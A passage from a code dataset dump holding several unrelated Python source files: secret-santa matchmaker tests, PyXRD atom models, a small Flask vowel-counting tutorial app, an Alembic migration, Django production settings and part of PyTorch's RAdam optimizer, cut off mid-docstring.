matchmaker.match([])\n\n def test_match_one_person(self):\n \"\"\"Test the match() method with a list of one Person object.\"\"\"\n matchmaker = Matchmaker()\n\n with self.assertRaises(ValueError):\n matchmaker.match([Mock('Lonely', 'forever@alone.com')])\n\n def test_match_two_person(self):\n \"\"\"Test the match() method with a list of two Person objects.\"\"\"\n red = Mock()\n red.name = 'Red'\n red.email = 'red@red.com'\n\n blue = Mock()\n blue.name = 'Blue'\n blue.email = 'blue@blue.com'\n\n matchmaker = Matchmaker()\n matchmaker.match([red, blue])\n assert red.santa is blue\n assert blue.santa is red\n\n def test_match_typical(self):\n \"\"\"Test the match() method in a typical condition.\"\"\"\n matchmaker = Matchmaker()\n\n # Test many times, checking if each case produced a derangement\n for i in range(200):\n people = []\n for c in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n person = Mock()\n person.name = c\n person.email = c + '@com.com'\n people.append(person)\n\n matchmaker.match(people)\n for person in people:\n assert person.santa is not person\n","repo_name":"SamuraiSigma/secret-santa","sub_path":"secret_santa/test/santa/test_matchmaker.py","file_name":"test_matchmaker.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5219476063","text":"from functools import partial\nfrom warnings import warn\n\nimport numpy as np\n\nfrom pyxrd.generic.io import storables, Storable, get_case_insensitive_glob\nfrom pyxrd.generic.models import DataModel\nfrom pyxrd.generic.models.mixins import CSVMixin\nfrom pyxrd.calculations.data_objects import AtomTypeData, AtomData\nfrom pyxrd.calculations.atoms import get_atomic_scattering_factor, get_structure_factor\n\nfrom mvc import Observer\nfrom mvc.models.properties.string_properties import StringProperty\nfrom mvc.models.properties.signal_mixin import SignalMixin\nfrom mvc.models.properties.float_properties import FloatProperty\nfrom mvc.models.properties.bool_property import BoolProperty\nfrom mvc.models.properties.read_only_mixin import ReadOnlyMixin\nfrom mvc.models.properties.labeled_property import LabeledProperty\nfrom mvc.models.properties.integer_properties import IntegerProperty\n\n@storables.register()\nclass 
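The property the Matchmaker tests assert is that match() produces a derangement: nobody is their own santa. One compact way to build such an assignment is to rotate a shuffled list by one position; this does not sample uniformly over all derangements, but it always satisfies the property, and it is only a sketch, not the real Matchmaker.match() implementation:

import random

def derange(people):
    if len(people) < 2:
        raise ValueError("need at least two participants")
    shuffled = list(people)
    random.shuffle(shuffled)
    # Rotation by one maps every element to a different element.
    return dict(zip(shuffled, shuffled[1:] + shuffled[:1]))

matches = derange(["red", "blue", "green"])
assert all(giver != santa for giver, santa in matches.items())
print(matches)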
AtomType(CSVMixin, DataModel, Storable):\n \"\"\"\n An AtomType model contains all the physical & chemical information for \n one ion, e.g. Fe3+ & Fe2+ are two different AtomTypes.\n \"\"\"\n\n # MODEL METADATA:\n class Meta(DataModel.Meta):\n store_id = \"AtomType\"\n\n #: The project this AtomType belongs to or None. Effectively an alias for `parent`.\n project = property(DataModel.parent.fget, DataModel.parent.fset)\n\n _data_object = None\n @property\n def data_object(self):\n \"\"\"\n The data object that is used in the calculations framework \n (see :mod:`pyxrd.generic.calculations.atoms`).\n Is an instance of :class:`~pyxrd.generic.calculations.data_objects.AtomTypeData`\n \"\"\"\n\n self._data_object.par_c = self.par_c\n self._data_object.debye = self.debye\n self._data_object.charge = self.charge\n self._data_object.weight = self.weight\n\n return self._data_object\n\n #: Name of the AtomType (e.g. :math:`Fe^{2+}`)\n name = StringProperty(\n default=\"\", text=\"Name\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: The atomic number, or an arbitrarily high number (+300) for compounds\n atom_nr = IntegerProperty(\n default=0, text=\"Atom Nr\",\n visible=True, persistent=True,\n widget_type=\"entry\"\n )\n\n def __get_par_a(self, index=0):\n return self._data_object.par_a[index]\n\n def __set_par_a(self, value, index=0):\n assert (index >= 0 and index < 5)\n self._data_object.par_a[index] = value\n\n def __get_par_b(self, index=0):\n return self._data_object.par_b[index]\n\n def __set_par_b(self, value, index=0):\n assert (index >= 0 and index < 5)\n self._data_object.par_b[index] = value\n\n #: Atomic scattering factor :math:`a_1`\n par_a1 = FloatProperty(\n default=0.0, text=\"a1\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=0), fset=partial(__set_par_a, index=0)\n )\n #: Atomic scattering factor :math:`a_2`\n par_a2 = FloatProperty(\n default=0.0, text=\"a2\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=1), fset=partial(__set_par_a, index=1)\n )\n #: Atomic scattering factor :math:`a_3`\n par_a3 = FloatProperty(\n default=0.0, text=\"a3\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=2), fset=partial(__set_par_a, index=2)\n )\n #: Atomic scattering factor :math:`a_4`\n par_a4 = FloatProperty(\n default=0.0, text=\"a4\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=3), fset=partial(__set_par_a, index=3)\n )\n #: Atomic scattering factor :math:`a_5`\n par_a5 = FloatProperty(\n default=0.0, text=\"a5\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=4), fset=partial(__set_par_a, index=4)\n )\n\n #: Atomic scattering factor :math:`b_1`\n par_b1 = FloatProperty(\n default=0.0, text=\"b1\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=0), fset=partial(__set_par_b, index=0)\n )\n #: Atomic scattering factor :math:`b_2`\n par_b2 = FloatProperty(\n default=0.0, text=\"b2\",\n visible=True, 
persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=1), fset=partial(__set_par_b, index=1)\n )\n #: Atomic scattering factor :math:`b_3`\n par_b3 = FloatProperty(\n default=0.0, text=\"b3\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=2), fset=partial(__set_par_b, index=2)\n )\n #: Atomic scattering factor :math:`b_4`\n par_b4 = FloatProperty(\n default=0.0, text=\"b4\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=3), fset=partial(__set_par_b, index=3)\n )\n #: Atomic scattering factor :math:`b_5`\n par_b5 = FloatProperty(\n default=0.0, text=\"b5\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=4), fset=partial(__set_par_b, index=4)\n )\n\n #: Atomic scattering factor c\n par_c = FloatProperty(\n default=0.0, text=\"c\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n #: Debye-Waller scattering factor\n debye = FloatProperty(\n default=0.0, text=\"c\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n #: The charge of the ion (eg. 3.0 for :math:`Al^{3+}`)\n charge = FloatProperty(\n default=0.0, text=\"Charge\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n #: The atomic weight for this ion\n weight = FloatProperty(\n default=0.0, text=\"Weight\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n # ------------------------------------------------------------\n # Initialization and other internals\n # ------------------------------------------------------------\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor takes any of its properties as a keyword argument.\n Any other arguments or keywords are passed to the base class.\n \"\"\"\n keys = [ \"data_%s\" % prop.label for prop in type(self).Meta.get_local_persistent_properties()]\n keys.extend([ prop.label for prop in type(self).Meta.get_local_persistent_properties()])\n my_kwargs = self.pop_kwargs(kwargs, *keys)\n super(AtomType, self).__init__(*args, **kwargs)\n kwargs = my_kwargs\n\n # Set up data object\n self._data_object = AtomTypeData(\n par_a=np.zeros(shape=(5,), dtype=float),\n par_b=np.zeros(shape=(5,), dtype=float),\n par_c=0.0,\n debye=0.0,\n charge=0.0,\n weight=0.0\n )\n\n # Set attributes:\n self.name = str(self.get_kwarg(kwargs, \"\", \"name\", \"data_name\"))\n self.atom_nr = int(self.get_kwarg(kwargs, 0, \"atom_nr\", \"data_atom_nr\"))\n self.weight = float(self.get_kwarg(kwargs, 0, \"weight\", \"data_weight\"))\n self.charge = float(self.get_kwarg(kwargs, 0, \"charge\", \"data_charge\"))\n self.debye = float(self.get_kwarg(kwargs, 0, \"debye\", \"data_debye\"))\n\n for kw in [\"par_a%d\" % i for i in range(1, 6)] + [\"par_b%d\" % i for i in range(1, 6)] + [\"par_c\"]:\n setattr(\n self, kw, self.get_kwarg(kwargs, 0.0, kw, \"data_%s\" % kw)\n )\n\n def __str__(self):\n return \"\" % (self.name, id(self))\n\n def get_atomic_scattering_factors(self, stl_range):\n \"\"\"\n Returns the atomic scattering factor for this `AtomType` for the 
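The par_a1..par_a5 and par_b1..par_b5 definitions in this class reuse a single getter/setter pair through functools.partial with a bound index. A minimal standalone reproduction of that pattern, using a plain property instead of FloatProperty and invented names:

from functools import partial

class Params:
    def __init__(self):
        self._a = [0.0] * 5

    def _get_a(self, index=0):
        return self._a[index]

    def _set_a(self, value, index=0):
        self._a[index] = value

    # partial() binds the index; property() then supplies the instance.
    a1 = property(partial(_get_a, index=0), partial(_set_a, index=0))
    a2 = property(partial(_get_a, index=1), partial(_set_a, index=1))

p = Params()
p.a2 = 3.5
print(p.a1, p.a2)  # 0.0 3.5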
given range\n of sin(theta)/lambda (`stl_range`) values. \n \"\"\"\n angstrom_range = ((stl_range * 0.05) ** 2)\n return get_atomic_scattering_factor(angstrom_range, self.data_object)\n\n pass # end of class\n\n@storables.register()\nclass Atom(DataModel, Storable):\n \"\"\"\n Atom objects combine structural information (z coordinate and proportion)\n and an AtomType. \n \"\"\"\n\n # MODEL METADATA:\n class Meta(DataModel.Meta):\n store_id = \"Atom\"\n layer_filters = [\n (\"Layer file\", get_case_insensitive_glob(\"*.lyr\")),\n ]\n\n _data_object = None\n @property\n def data_object(self):\n \"\"\"\n The data object that is used in the calculations framework \n (see :mod:`pyxrd.generic.calculations.atoms`).\n Is an instance of :class:`~pyxrd.generic.calculations.data_objects.AtomData` \n \"\"\"\n self._data_object.default_z = self.default_z\n self._data_object.stretch_z = self.stretch_z\n self._data_object.pn = self.pn\n self._data_object.atom_type = getattr(self.atom_type, \"data_object\", None)\n return self._data_object\n\n component = property(DataModel.parent.fget, DataModel.parent.fset)\n\n # PROPERTIES:\n\n #: The name of the Atom\n name = StringProperty(\n default=\"\", text=\"Name\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: Default z coordinate for this Atom. Also see :attr:`~z`\n default_z = FloatProperty(\n default=0.0, text=\"Default z\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: Flag indicating whether or not z coordinates should be stretched\n #: using the silicate lattice and unit cell dimensions from the Component.\n #: Should be set for interlayer atoms, so their z coordinates are adjusted\n #: when the component basal spacing is changed. Also see `z`.\n stretch_z = BoolProperty(\n default=False, text=\"Stretch z values\",\n visible=False, persistent=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: The z coordinate for this atom. If `stretch_values` is False or if\n #: this Atom's component is None, then this will return the `default_z`\n #: value. 
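The par_a*, par_b*, and par_c values parameterize the usual five-Gaussian atomic scattering factor, f(s) = sum_i a_i * exp(-b_i * s^2) + c with s = sin(theta)/lambda. A hedged numerical sketch; the parameter values below are placeholders, not entries from PyXRD's tables, and the unit conversion done by get_atomic_scattering_factors is omitted:

import numpy as np

def scattering_factor(s2, a, b, c):
    # s2 is s squared; broadcast the 5 Gaussians over the grid and sum them.
    a = np.asarray(a)[:, None]
    b = np.asarray(b)[:, None]
    return np.sum(a * np.exp(-b * np.asarray(s2)[None, :]), axis=0) + c

s = np.linspace(0.0, 0.6, 4)  # sin(theta)/lambda grid
f = scattering_factor(s ** 2, a=[11.0, 7.0, 3.5, 1.0, 0.5],
                      b=[4.6, 0.3, 12.0, 31.0, 0.1], c=0.3)
print(f)  # f(0) equals sum(a) + c and decays with s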
If `stretch_values` is True and a component is set on this Atom,\n #: it is calculated as::\n #:\n #: `lattice_d + (default_z - lattice_d) * factor`\n #:\n #: where `lattice_d` and `factor` are given by calling\n #:`get_interlayer_stretch_factors` on the :class:`~pyxrd.phases.models.Component`.\n @FloatProperty(\n default=None, text=\"Z\",\n visible=True, tabular=True,\n mix_with=(ReadOnlyMixin,)\n )\n def z(self):\n if self.stretch_values and self.component is not None:\n lattice_d, factor = self.component.get_interlayer_stretch_factors()\n return float(lattice_d + (self.default_z - lattice_d) * factor)\n return self.default_z\n\n #: The # of atoms (projected onto the c-axis for the considered unit cell)\n pn = FloatProperty(\n default=None, text=\"Multiplicity\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n def _get_weight(self):\n if self.atom_type is not None:\n return self.pn * self.atom_type.weight\n else:\n return 0.0\n\n #: The total weight for this Atom, taking `pn` into consideration.\n weight = FloatProperty(\n default=None, text=\"Weight\", fget=_get_weight,\n visible=False, persistent=False,\n mix_with=(ReadOnlyMixin,)\n )\n\n _atom_type_uuid = None\n _atom_type_name = None\n def _set_atom_type(self, value):\n old = type(self).atom_type._get(self)\n if old is not None:\n self.relieve_model(old)\n type(self).atom_type._set(self, value)\n if value is not None:\n self.observe_model(value)\n\n #: The AtomType to be used for this Atom.\n atom_type = LabeledProperty(\n default=None, text=\"Atom Type\",\n visible=True, persistent=False, tabular=True, data_type=AtomType,\n signal_name=\"data_changed\",\n fset=_set_atom_type,\n mix_with=(SignalMixin,)\n )\n\n # ------------------------------------------------------------\n # Initialization and other internals\n # ------------------------------------------------------------\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor takes any of its properties as a keyword argument.\n \n In addition to the above, the constructor still supports the \n following deprecated keywords, maping to a current keyword:\n - z: maps to the 'default_z' keyword.\n \n Any other arguments or keywords are passed to the base class.\n \"\"\"\n\n my_kwargs = self.pop_kwargs(kwargs,\n \"data_name\", \"data_z\", \"z\", \"data_pn\", \"data_atom_type\", \"stretch_z\",\n \"atom_type_uuid\", \"atom_type_name\", \"atom_type_index\", \"atom_type\",\n *[prop.label for prop in type(self).Meta.get_local_persistent_properties()]\n )\n super(Atom, self).__init__(*args, **kwargs)\n kwargs = my_kwargs\n\n # Set up data object\n self._data_object = AtomData(\n default_z=0.0,\n pn=0.0\n )\n\n # Set attributes\n self.name = str(self.get_kwarg(kwargs, \"\", \"name\", \"data_name\"))\n\n self.stretch_values = bool(self.get_kwarg(kwargs, False, \"stretch_values\"))\n self.default_z = float(self.get_kwarg(kwargs, 0.0, \"default_z\", \"data_z\", \"z\"))\n self.pn = float(self.get_kwarg(kwargs, 0.0, \"pn\", \"data_pn\"))\n\n self.atom_type = self.get_kwarg(kwargs, None, \"atom_type\")\n self._atom_type_uuid = self.get_kwarg(kwargs, None, \"atom_type_uuid\")\n self._atom_type_name = self.get_kwarg(kwargs, None, \"atom_type_name\")\n\n def __str__(self):\n return \"\" % (self.name, repr(self))\n\n def _unattach_parent(self):\n self.atom_type = None\n super(Atom, self)._unattach_parent()\n\n # ------------------------------------------------------------\n # Notifications of observable properties\n # 
------------------------------------------------------------\n @Observer.observe(\"removed\", signal=True)\n def on_removed(self, model, prop_name, info):\n \"\"\"\n This method observes the Atom types 'removed' signal,\n as such, if the AtomType gets removed from the parent project,\n it is also cleared from this Atom\n \"\"\"\n if model == self.atom_type:\n self.atom_type = None\n\n # ------------------------------------------------------------\n # Methods & Functions\n # ------------------------------------------------------------\n def get_structure_factors(self, stl_range):\n \"\"\"\n Get the atom's structure factor for a given range of 2*sin(θ) / λ values.\n Expects λ to be in nanometers!\n \"\"\"\n if self.atom_type is not None:\n return float(get_structure_factor(stl_range, self.data_object))\n else:\n return 0.0\n\n # ------------------------------------------------------------\n # Input/Output stuff\n # ------------------------------------------------------------\n def resolve_json_references(self):\n if getattr(self, \"_atom_type_uuid\", None) is not None:\n self.atom_type = type(type(self)).object_pool.get_object(self._atom_type_uuid)\n if getattr(self, \"_atom_type_name\", None) is not None:\n assert(self.component is not None)\n assert(self.component.phase is not None)\n assert(self.component.phase.project is not None)\n for atom_type in self.component.phase.project.atom_types:\n if atom_type.name == self._atom_type_name:\n self.atom_type = atom_type\n break\n self._atom_type_uuid = None\n self._atom_type_name = None\n\n def json_properties(self):\n retval = super(Atom, self).json_properties()\n if self.component is None or self.component.export_atom_types:\n retval[\"atom_type_name\"] = self.atom_type.name if self.atom_type is not None else \"\"\n else:\n retval[\"atom_type_uuid\"] = self.atom_type.uuid if self.atom_type is not None else \"\"\n return retval\n\n @staticmethod\n def get_from_csv(filename, callback=None, parent=None):\n \"\"\"\n Returns a list of atoms fetched from the .CSV file `filename`.\n If parent is passed, this will be used to resolve AtomType references,\n and will be passed to the constructor of the Atom as a keyword.\n If callback is passes it will be called with the loaded atom as the\n first and only argument.\n \"\"\"\n import csv\n atl_reader = csv.reader(open(filename, 'rb'), delimiter=',', quotechar='\"') # TODO create csv dialect!\n header = True\n atoms = []\n\n types = dict()\n if parent is not None:\n for atom_type in parent.phase.project.atom_types:\n if not atom_type.name in types:\n types[atom_type.name] = atom_type\n\n for row in atl_reader:\n if not header and len(row) >= 4:\n if len(row) == 5:\n name, z, def_z, pn, atom_type = row[0], float(row[1]), float(row[2]), float(row[3]), types[row[4]] if parent is not None else None\n else:\n name, z, pn, atom_type = row[0], float(row[1]), float(row[2]), types[row[3]] if parent is not None else None\n def_z = z\n\n if atom_type in types:\n atom_type = types[atom_type]\n\n new_atom = Atom(name=name, z=z, default_z=def_z, pn=pn, atom_type=atom_type, parent=parent)\n atoms.append(new_atom)\n if callback is not None and callable(callback):\n callback(new_atom)\n del new_atom\n\n header = False\n return atoms\n\n @staticmethod\n def save_as_csv(filename, atoms):\n \"\"\"\n Saves a list of atoms to the passed filename.\n \"\"\"\n import csv\n atl_writer = csv.writer(open(filename, 'wb'), delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n atl_writer.writerow([\"Atom\", \"z\", \"def_z\", 
\"pn\", \"Element\"])\n for item in atoms:\n if item is not None and item.atom_type is not None:\n atl_writer.writerow([item.name, item.z, item.default_z, item.pn, item.atom_type.name])\n\n pass # end of class\n\n","repo_name":"PyXRD/PyXRD","sub_path":"pyxrd/atoms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19559,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"74051437032","text":"from flask import Flask, render_template, request, jsonify\nfrom funcion_vocales import vocales\n\n# Crear la app\napp = Flask(__name__)\n\n# Endpoints (rutas de acceso a la app)\n# Visualizar la ruta de inicio \"/\"\n@app.route(\"/\")\n# Asociar la función correspondiente\ndef index(): \n # render_template, permite mostrar archivos html\n return render_template(\"index.html\")\n\n\n# Nueva ruta\n# Endpoints\n@app.route(\"/recibir\", methods=[\"POST\"])\ndef recibir():\n # request permite capturar los datos enviados\n nombre = request.form[\"nombreIngresado\"]\n print(\"Nombre recibido\", nombre)\n\n # Validar \n if nombre.isalpha()==True:\n mensaje = f'{nombre} tiene {vocales(nombre)} vocales'\n \n else:\n mensaje = f'Nombre no válido, intente nuevamente'\n\n return render_template(\"index.html\",nombre=nombre, mensaje=mensaje)\n\n\n@app.route(\"/api\")\ndef api():\n datos = [{\"name\": \"Lila\"}, {\"name\": \"Lolo\"},{\"name\": \"Miguel\"}]\n return jsonify(datos)\n\n# Programa principal\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"sebamacha/curso_Python_Full_Stack","sub_path":"Backend/Phyton/PYTHON - 8/PYTHON_8_RESUELTO/ejemplo_2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16447764717","text":"\"\"\"Rename config\n\nRevision ID: b90dcb36a10a\nRevises: 7c6433145877\nCreate Date: 2017-08-21 14:16:40.991460\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'b90dcb36a10a'\ndown_revision = '7c6433145877'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('cfg_settings',\n sa.Column('key', sa.String(length=128), nullable=False),\n sa.Column('date_created', sa.DateTime(timezone=True), nullable=True),\n sa.Column('date_modified', sa.DateTime(timezone=True), nullable=True),\n sa.Column('public', sa.Boolean(), nullable=True),\n sa.Column('value', sa.TEXT(), nullable=True),\n sa.Column('description', sa.String(length=512), nullable=True),\n sa.PrimaryKeyConstraint('key')\n )\n op.create_index('ix_cfg_settings_key', 'cfg_settings', ['key'], unique=False)\n op.create_index('ix_cfg_settings_public', 'cfg_settings', ['public'], unique=False)\n op.drop_table('config')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('config',\n sa.Column('date_created', sa.DATETIME(), nullable=True),\n sa.Column('date_modified', sa.DATETIME(), nullable=True),\n sa.Column('key', mysql.VARCHAR(length=256), nullable=True),\n sa.Column('public', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.Column('value', mysql.VARCHAR(length=2048), nullable=True),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.drop_index('ix_cfg_settings_public', table_name='cfg_settings')\n op.drop_index('ix_cfg_settings_key', table_name='cfg_settings')\n op.drop_table('cfg_settings')\n # ### end Alembic commands ###\n","repo_name":"InQuest/ThreatKB","sub_path":"migrations/versions/b90dcb36a10a_rename_config.py","file_name":"b90dcb36a10a_rename_config.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"72"} +{"seq_id":"16665041488","text":"\"\"\"\nProduction Django settings for TheDoubleR project.\n\"\"\"\nimport os\n\nfrom .base import *\n\nDATA_DIR = Path('/data')\n\nSECRET_KEY = os.environ['DJANGO_SECRET_KEY']\nALLOWED_HOSTS = os.environ.get('DJANGO_ALLOWED_HOSTS', '*').split(',')\n\nif 'POSTGRES_HOST' in os.environ.keys():\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'HOST': os.environ['POSTGRES_HOST'],\n 'PORT': os.environ.get('POSTGRES_PORT', '5432'),\n 'NAME': os.environ['POSTGRES_DB'],\n 'USER': os.environ['POSTGRES_USER'],\n 'PASSWORD': os.environ['POSTGRES_PASSWORD'],\n }\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': DATA_DIR / 'db.sqlite3',\n }\n }\n\nSTATIC_ROOT = DATA_DIR / 'static'\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n 'LOCATION': DATA_DIR / 'cache/django',\n }\n}\n","repo_name":"thatsed/TheDoubleR","sub_path":"conf/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14833350639","text":"import math\nfrom typing import List, Optional\n\nimport torch\nfrom torch import Tensor\n\nfrom .optimizer import (\n Optimizer,\n _default_to_fused_or_foreach,\n _differentiable_doc,\n _dispatch_sqrt,\n _foreach_doc,\n _get_value,\n _stack_if_compiling,\n _use_grad_for_differentiable,\n _view_as_real,\n)\n\n__all__ = [\"RAdam\", \"radam\"]\n\n\nclass RAdam(Optimizer):\n def __init__(\n self,\n params,\n lr=1e-3,\n betas=(0.9, 0.999),\n eps=1e-8,\n weight_decay=0,\n decoupled_weight_decay: bool = False,\n *,\n foreach: Optional[bool] = None,\n differentiable: bool = False,\n ):\n if not 0.0 <= lr:\n raise ValueError(f\"Invalid learning rate: {lr}\")\n if not 0.0 <= eps:\n raise ValueError(f\"Invalid epsilon value: {eps}\")\n if not 0.0 <= betas[0] < 1.0:\n raise ValueError(f\"Invalid beta parameter at index 0: {betas[0]}\")\n if not 0.0 <= betas[1] < 1.0:\n raise ValueError(f\"Invalid beta parameter at index 1: {betas[1]}\")\n if not 0.0 <= weight_decay:\n raise ValueError(f\"Invalid weight_decay value: {weight_decay}\")\n defaults = dict(\n lr=lr,\n betas=betas,\n eps=eps,\n weight_decay=weight_decay,\n foreach=foreach,\n decoupled_weight_decay=decoupled_weight_decay,\n differentiable=differentiable,\n )\n super().__init__(params, defaults)\n\n def __setstate__(self, state):\n super().__setstate__(state)\n for group in self.param_groups:\n group.setdefault(\"foreach\", None)\n group.setdefault(\"differentiable\", False)\n 
group.setdefault(\"decoupled_weight_decay\", False)\n state_values = list(self.state.values())\n step_is_tensor = (len(state_values) != 0) and torch.is_tensor(\n state_values[0][\"step\"]\n )\n if not step_is_tensor:\n for s in state_values:\n s[\"step\"] = torch.tensor(float(s[\"step\"]))\n\n def _init_group(self, group, params_with_grad, grads, exp_avgs, exp_avg_sqs, state_steps):\n has_complex = False\n for p in group[\"params\"]:\n if p.grad is not None:\n has_complex |= torch.is_complex(p)\n params_with_grad.append(p)\n if p.grad.is_sparse:\n raise RuntimeError(\"RAdam does not support sparse gradients\")\n grads.append(p.grad)\n\n state = self.state[p]\n # Lazy state initialization\n if len(state) == 0:\n state[\"step\"] = torch.tensor(0.0)\n # Exponential moving average of gradient values\n state[\"exp_avg\"] = torch.zeros_like(\n p, memory_format=torch.preserve_format\n )\n # Exponential moving average of squared gradient values\n state[\"exp_avg_sq\"] = torch.zeros_like(\n p, memory_format=torch.preserve_format\n )\n\n exp_avgs.append(state[\"exp_avg\"])\n exp_avg_sqs.append(state[\"exp_avg_sq\"])\n state_steps.append(state[\"step\"])\n\n return has_complex\n\n @_use_grad_for_differentiable\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Args:\n closure (Callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n with torch.enable_grad():\n loss = closure()\n\n for group in self.param_groups:\n params_with_grad = []\n grads = []\n exp_avgs = []\n exp_avg_sqs = []\n state_steps = []\n beta1, beta2 = group[\"betas\"]\n\n has_complex = self._init_group(group, params_with_grad, grads, exp_avgs, exp_avg_sqs, state_steps)\n\n radam(\n params_with_grad,\n grads,\n exp_avgs,\n exp_avg_sqs,\n state_steps,\n beta1=beta1,\n beta2=beta2,\n lr=group[\"lr\"],\n weight_decay=group[\"weight_decay\"],\n eps=group[\"eps\"],\n foreach=group[\"foreach\"],\n differentiable=group[\"differentiable\"],\n decoupled_weight_decay=group[\"decoupled_weight_decay\"],\n has_complex=has_complex,\n )\n\n return loss\n\n\nRAdam.__doc__ = r\"\"\"Implements RAdam algorithm.\n\n .. 
math::\n \\begin{aligned}\n &\\rule{110mm}{0.4pt} \\\\\n &\\textbf{input} : \\gamma \\text{ (lr)}, \\: \\beta_1, \\beta_2\n \\text{ (betas)}, \\: \\theta_0 \\text{ (params)}, \\:f(\\theta) \\text{ (objective)}, \\:\n \\lambda \\text{ (weightdecay)}, \\\\\n &\\hspace{13mm} \\epsilon \\text{ (epsilon)}, \\textit{decoupled\\_weight\\_decay} \\\\\n &\\textbf{initialize} : m_0 \\leftarrow 0 \\text{ ( first moment)},\n v_0 \\leftarrow 0 \\text{ ( second moment)}, \\\\\n &\\hspace{18mm} \\rho_{\\infty} \\leftarrow 2/(1-\\beta_2) -1 \\\\[-1.ex]\n &\\rule{110mm}{0.4pt} \\\\\n &\\textbf{for} \\: t=1 \\: \\textbf{to} \\: \\ldots \\: \\textbf{do} \\\\\n &\\hspace{6mm} g_t \\leftarrow \\nabla_{\\theta} f_t (\\theta_{t-1}) \\\\\n &\\hspace{6mm} \\theta_t \\leftarrow \\theta_{t-1} \\\\\n &\\hspace{6mm} \\textbf{if} \\: \\lambda \\neq 0 \\\\\n &\\hspace{12mm}\\textbf{if} \\: \\textit{decoupled\\_weight\\_decay} \\\\\n &\\hspace{18mm} \\theta_t \\leftarrow \\theta_{t} - \\gamma \\lambda \\theta_{t} \\\\\n &\\hspace{12mm}\\textbf{else} \\\\\n &\\hspace{18mm} g_t \\leftarrow g_t + \\lambda \\theta_{t} \\\\\n &\\hspace{6mm}m_t \\leftarrow \\beta_1 m_{t-1} + (1 - \\beta_1) g_t \\\\\n &\\hspace{6mm}v_t \\leftarrow \\beta_2 v_{t-1} + (1-\\beta_2) g^2_t \\\\\n &\\hspace{6mm}\\widehat{m_t} \\leftarrow m_t/\\big(1-\\beta_1^t \\big) \\\\\n &\\hspace{6mm}\\rho_t \\leftarrow \\rho_{\\infty} -\n 2 t \\beta^t_2 /\\big(1-\\beta_2^t \\big) \\\\[0.1.ex]\n &\\hspace{6mm}\\textbf{if} \\: \\rho_t > 5 \\\\\n &\\hspace{12mm} l_t \\leftarrow \\frac{\\sqrt{ (1-\\beta^t_2) }}{ \\sqrt{v_t} 